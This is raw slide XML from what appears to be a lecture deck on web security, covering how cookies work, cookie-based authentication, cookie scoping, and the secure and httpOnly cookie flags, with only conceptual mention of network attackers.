        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="4894055"/>
            <a:ext cx="2411494" cy="70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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST  …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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373207" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5488142" y="5967204"/>
            <a:ext cx="43081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tx2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US"/>
              <a:t>HTTP is stateless protocol; cookies add state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1373208" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4284454"/>
            <a:ext cx="807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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/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654300" y="3217658"/>
            <a:ext cx="2984500" cy="646113"/>
            <a:chOff x="712" y="2304"/>
            <a:chExt cx="1880" cy="407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373210" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="712" y="2304"/>
              <a:ext cx="1080" cy="407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If expires=NULL:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>this session only</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373211" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2016" y="2496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8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29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31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3199" grpId="0" animBg="1"/>
      <p:bldP spid="1373200" grpId="0" animBg="1"/>
      <p:bldP spid="1373201" grpId="0" animBg="1"/>
      <p:bldP spid="1373202" grpId="0" animBg="1"/>
      <p:bldP spid="1373203" grpId="0" animBg="1"/>
      <p:bldP spid="1373204" grpId="0" animBg="1"/>
      <p:bldP spid="1373205" grpId="0" animBg="1"/>
      <p:bldP spid="1373206" grpId="0"/>
      <p:bldP spid="1373207" grpId="0"/>
      <p:bldP spid="137320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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9982200" y="866963"/>
            <a:ext cx="533400" cy="99060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3016" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="866963"/>
            <a:ext cx="533400" cy="99060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Cookie authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323012" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="1857563"/>
            <a:ext cx="1219200" cy="43434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/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="1857563"/>
            <a:ext cx="1219200" cy="43434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3014" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9220200" y="1857563"/>
            <a:ext cx="1219200" cy="43434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323015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1460688"/>
            <a:ext cx="955454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/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323017" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5678488" y="1476563"/>
            <a:ext cx="1272528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/>
              <a:t>Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9117014" y="1476563"/>
            <a:ext cx="1276183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/>
              <a:t>Auth server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3124200" y="1946466"/>
            <a:ext cx="2667000" cy="646113"/>
            <a:chOff x="1008" y="1400"/>
            <a:chExt cx="1680" cy="407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323020" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1008" y="1632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23021" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="1400"/>
              <a:ext cx="1145" cy="40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POST login.cgi</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Username &amp; pwd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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7010401" y="2251264"/>
            <a:ext cx="2106613" cy="396875"/>
            <a:chOff x="3456" y="1592"/>
            <a:chExt cx="1327" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323022" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1842"/>
              <a:ext cx="132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23023" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="1592"/>
              <a:ext cx="882" cy="23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Validate user</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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7010401" y="2984691"/>
            <a:ext cx="3252788" cy="690563"/>
            <a:chOff x="3456" y="2054"/>
            <a:chExt cx="2049" cy="435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 34"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="2054"/>
              <a:ext cx="1392" cy="233"/>
              <a:chOff x="3456" y="2054"/>
              <a:chExt cx="1392" cy="233"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1323024" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3456" y="2256"/>
                <a:ext cx="13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323025" name="Text Box 17"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="2054"/>
                <a:ext cx="640" cy="23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 type="none" w="lg" len="med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rgbClr val="009900"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>auth=val</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323027" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4877" y="2256"/>
              <a:ext cx="628" cy="23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Store val</a:t>
              </a:r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3124200" y="3060893"/>
            <a:ext cx="2667000" cy="369888"/>
            <a:chOff x="1008" y="2102"/>
            <a:chExt cx="1680" cy="233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323028" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1008" y="2304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23029" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="2102"/>
              <a:ext cx="1330" cy="23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Set-cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323030" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3914963"/>
            <a:ext cx="914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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4127692"/>
            <a:ext cx="2667000" cy="646113"/>
            <a:chOff x="1008" y="2774"/>
            <a:chExt cx="1680" cy="407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323031" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2976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23032" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1064" y="2774"/>
              <a:ext cx="1259" cy="40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GET restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Cookie:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a:r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7010400" y="4326131"/>
            <a:ext cx="2209800" cy="646113"/>
            <a:chOff x="3456" y="2899"/>
            <a:chExt cx="1392" cy="407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323033" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="3120"/>
              <a:ext cx="13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23034" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="2899"/>
              <a:ext cx="992" cy="40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restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>auth=val</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 38"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="5286571"/>
            <a:ext cx="2209800" cy="369888"/>
            <a:chOff x="3456" y="3504"/>
            <a:chExt cx="1392" cy="233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323035" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456" y="3552"/>
              <a:ext cx="13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23036" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3832" y="3504"/>
              <a:ext cx="569" cy="23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YES/NO</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 37"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3213100" y="5286568"/>
            <a:ext cx="2465388" cy="646113"/>
            <a:chOff x="1064" y="3504"/>
            <a:chExt cx="1553" cy="407"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323037" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1064" y="3744"/>
              <a:ext cx="155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23038" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="3504"/>
              <a:ext cx="1192" cy="40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If YES,  </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>      restricted.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323048" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9185275" y="4600763"/>
            <a:ext cx="1064522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Check val</a:t>
            </a:r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40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69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30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2133600" y="304800"/>
            <a:ext cx="7772400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a:r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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1808205" y="1371601"/>
            <a:ext cx="4992645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0" t="14063" r="20681" b="15299"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885936" y="1219201"/>
            <a:ext cx="4401065" cy="462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78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Cookie Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13742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362200" y="1524000"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tracking:   e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will store:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At most  20 cookies/site,     3 KB / cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;domain, path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set cookies valid across a domain suffix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		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74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63" name="Rectangle 3"/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7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Secure Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="1692275"/>
            <a:ext cx="1128713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23365" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="1792288"/>
            <a:ext cx="914400" cy="60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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423366" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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23367" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2759075"/>
            <a:ext cx="1143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23368" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="2525713"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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423369" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423370" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="207327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423371" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5311879" y="1600200"/>
            <a:ext cx="7665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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423372" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="230187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423373" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2362201"/>
            <a:ext cx="4800600" cy="1034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  <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Header: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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Secure=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423374" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3765550"/>
            <a:ext cx="7772400" cy="2603790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  <a:effectLst/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2400"/>
              <a:t>  Provides confidentiality against network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Browser will only send cookie back over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  … but no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Can rewrite secure cookies over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> network attacker can rewrite secure cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> can log user into attacker’s account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/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52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38" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828801" y="990600"/>
            <a:ext cx="2157413" cy="53340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5539" name="Rectangle 3"/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7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>httpOnly Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
